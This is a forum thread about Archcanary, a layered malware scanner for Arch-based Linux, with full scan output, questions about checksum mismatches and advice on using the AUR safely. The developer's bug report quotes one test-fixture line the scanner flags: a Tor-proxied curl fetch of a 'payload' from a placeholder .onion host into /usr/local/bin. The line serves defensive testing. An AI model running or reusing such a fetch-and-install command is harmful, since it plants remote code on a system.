Archcanary — a layered security scanner for Arch-based Linux

take a day tops to learn and understand the basics, am can link and help but if you dont want to actually learn 0 time

am a day a big overestimate, more like an hour tops

EXCELLENT! The convenience of a GUI but in terminal. This is so much better.

Full oputput:

🐤 archcanary
----------------------------------------------
 1) Full scan                        ?
 2) Refresh + Full scan
 3) Individual checks
 4) Root checks                       [root]
 5) Lynis hardening report            [root]
 6) Run Lynis audit                   [root]
 7) Setup health check (--doctor)
 8) Search packages
 9) Manage allowlists
10) Edit config
11) Settings
12) About
 0) Quit

Choice: 1

$ archcanary --full
(sudo may prompt for your password)

[sudo] password for wombat: 
============================================================
 Archcanary v0.1.31
 Scanned: 2026-08-26 08:13

 Lists loaded
   package_list.txt  infostealer + eBPF rootkit  1936 pkgs
   + CHAOS RAT         7 pkgs
   + Russian Spam     75 pkgs
   + Community Reports 93 pkgs
   + aur-audit black 103 pkgs
   + aur-audit red   241 pkgs

 Packages checked: 2455
============================================================

--- [1] Currently installed foreign packages ---
  Clean: no infected packages currently installed.

--- [2] Historical pacman logs ---
LOG_HIST_SEEN: discord-qt (installed on 2026-08-06T11:09:38-0500)
  NOTE: log match(es) already flagged in a previous scan (package no
  longer installed) — shown for the record, not re-counted as a warning:
  - discord-qt (installed on 2026-08-06T11:09:38-0500)

--- [3] Systemd persistence check ---
  Clean: no suspicious systemd units found.

--- [4] eBPF rootkit check ---
  Clean: no eBPF rootkit traces detected.

--- [5] npm cache check ---
  Clean: no malicious packages in npm cache.

--- [6] bun cache check ---
  Clean: no malicious packages in bun cache.

--- [6b] yarn cache check ---
  Clean: no malicious packages in yarn cache.

--- [6c] pnpm cache check ---
  Clean: no malicious packages in pnpm store/cache.

--- [7] PKGBUILD/install file scan (obfuscation-aware) ---
  Clean: no malicious commands found in 34 PKGBUILD/install file(s).

--- [8] Loaded eBPF programs/links (bpftool) ---
  Loaded eBPF programs: 32
  INFO: lsm eBPF programs present — expected (systemd sandboxing / AppArmor / SELinux).
  Perf attachments (kprobe/tracepoint): none.
  Net attachments (XDP/TC): none.

--- [9] ld.so.preload injection check ---
  Clean: /etc/ld.so.preload not present or empty.
  INFO: ld.so.conf.d entry present: /etc/ld.so.conf.d/lib32-glibc.conf (mtime 2026-08-10)

--- [10] XDG autostart + shell RC persistence check ---
  INFO: autostart entry allowlisted (unresolved binary): /home/wombat/.config/autostart/it.mijorus.gearlever.desktop
    Exec=gearlever
  Clean: no suspicious autostart or shell RC entries found.

--- [11] Kernel module / DKMS audit ---
  Clean: all loaded modules traceable to pacman packages or DKMS.

--- [12] Lynis hardening report ---
  Skipped: lynis not installed (pacman -S lynis).

--- [13] Package file integrity ---
  Verifying installed file checksums against pacman database...
  (May take 30-60 seconds on large installs)
  5 file(s) with unexpected checksum mismatch:

  * info: eos-qogir-icons: /usr/share/icons/Qogir/icon-theme.cache (SHA256 checksum mismatch)
  * info: eos-qogir-icons: /usr/share/icons/Qogir-Dark/icon-theme.cache (SHA256 checksum mismatch)
  * info: filesystem: /usr/lib/os-release (SHA256 checksum mismatch)
  * info: libvlc: /usr/lib/vlc/plugins/plugins.dat (SHA256 checksum mismatch)
  * info: lsb-release: /etc/lsb-release (SHA256 checksum mismatch)

  INFO: non-binary mismatches (config/cache/state) — likely a pacman hook or
  the package's own tooling regenerating them by design. Reinstalling won't
  fix this; only worth investigating if the change itself looks unexpected.
  Packages: filesystem, libvlc, lsb-release, eos-qogir-icons


 Check summary
 ───────────────────────────────────────────────────────
 [1]  Package list (2455 pkgs)             ✅  clean
 [2]  pacman.log history                   ✅  clean
 [3]  Systemd persistence                  ✅  clean
 [4]  eBPF rootkit traces                  ✅  clean
 [5]  npm cache                            ✅  clean
 [6]  bun cache                            ✅  clean
 [6b] yarn cache                           ✅  clean
 [6c] pnpm cache                           ✅  clean
 [7]  PKGBUILD obfuscation scan            ✅  clean
 [8]  eBPF programs (bpftool)              ✅  clean
 [9]  ld.so.preload injection              ✅  clean
 [10] XDG autostart + shell RCs            ✅  clean
 [11] Kernel modules (DKMS)                ✅  clean
 [12] Lynis hardening                      ⚠   skipped (not installed)
 [13] Package integrity                    ✅  clean
 ───────────────────────────────────────────────────────
============================================================
 RESULT: CLEAN - No indicators found.
============================================================

Full scan: CLEAN

Press Enter to continue...

BUG report.

If you get something about archcanary test being flagged as warning… this is a warning about it own TOR test. I am working on a fix. It is telling, the test scan is working :wink:

WARNING: Tor/SOCKS-proxied fetch in /home/user/.cache/yay/archcanary/src/archcanary-0.1.31/tests/fake_pkgbuilds/pkg-multi-technique/.pkg-multi-technique.install:3
        curl -x socks5h://127.0.0.1:9050 http://exampleplaceholderaddress.onion/payload -o /usr/local/bin/payload

Thanks for using the tool :slight_smile:

wait what was I calling dumb? got a feeling I done soemthing wring here or I dumber than what I commented here/Sorry people

yup a little bit of learning to do but not much

Are those normal?

--- [13] Package file integrity ---
  Verifying installed file checksums against pacman database...
  (May take 30-60 seconds on large installs)
  7 file(s) with unexpected checksum mismatch:

  * info: eos-qogir-icons: /usr/share/icons/Qogir/icon-theme.cache (SHA256 checksum mismatch)
  * info: eos-qogir-icons: /usr/share/icons/Qogir-Dark/icon-theme.cache (SHA256 checksum mismatch)
  * info: filesystem: /usr/lib/os-release (SHA256 checksum mismatch)
  * info: ghc-libs: /usr/lib/ghc-9.6.6/lib/package.conf.d/package.cache (SHA256 checksum mismatch)
  * info: libvlc: /usr/lib/vlc/plugins/plugins.dat (SHA256 checksum mismatch)
  * info: lsb-release: /etc/lsb-release (SHA256 checksum mismatch)
  * info: whisper-toggle: /usr/bin/whisper-toggle (SHA256 checksum mismatch)

  INFO: non-binary mismatches (config/cache/state) — likely a pacman hook or
  the package's own tooling regenerating them by design. Reinstalling won't
  fix this; only worth investigating if the change itself looks unexpected.
  Packages: filesystem, libvlc, whisper-toggle, lsb-release, ghc-libs, eos-qogir-icons

These look normal to me. lsb-release and os-release don’t match because EOS updates them. The theme caches get updated.

i know i still have many learning to do ,but still not going to use the aur and learn much more first when i can , hope i can…

ther is not much to learn and once learnt it like riding a bike and becomes second nature.
You can always open a thread here and ask if unsure about something, better to ask what may seem a dumb question (more than often they aren’t) than do a dumb acttion

YES :wink: see it as INFO. Just leave it as is.

Awesome job with the TUI! Much love!

Now… do I dare switch to the AUR version? I haven’t used AUR since Spring. I think there’s a bunch of packages I haven’t updated. :sweat_smile:

Please don’t run outdated packages on your system this can be even worse than a simple malware attack.

Either have faith in the tools you choose to use or switch tools.

Well I updated. Oldest was like 50 days old. Arccanary says all is good.

I would call that outdated on a rolling release. I don’t get much data at times and speed can be an issue but Iif I couldn’t update at least once a month max I would look at using something else.

Sadly some of the apps I need are only in the AUR, otherwise I wouldn’t even need to worry about any of it. I was just being hyper careful about using the AUR. (Before I had archcanary.) When you don’t fully understand what’s going on, don’t do a damn thing and play it safe. Didn’ t have time to look over every single detail of every package. Still don’t. And I still feel like the average computer user shouldn’t have to be a software engineer to be able to stay secure with software.

The average Computer users are not the target audience of Arch. The Proficient Linux user is.

Alternatively, what I did was buy a couple of cheap secondhand laptops (slightly more than $200 each) to test and learn on. Only successful tests using newly gained and proven knowledge make it to my “real” PC.

Call it “lifelong learning”.

Agree with @thefrog. The average user runs Windows, Mac, Android.

OK I’ll rephrase, the average Linux user. :smiley: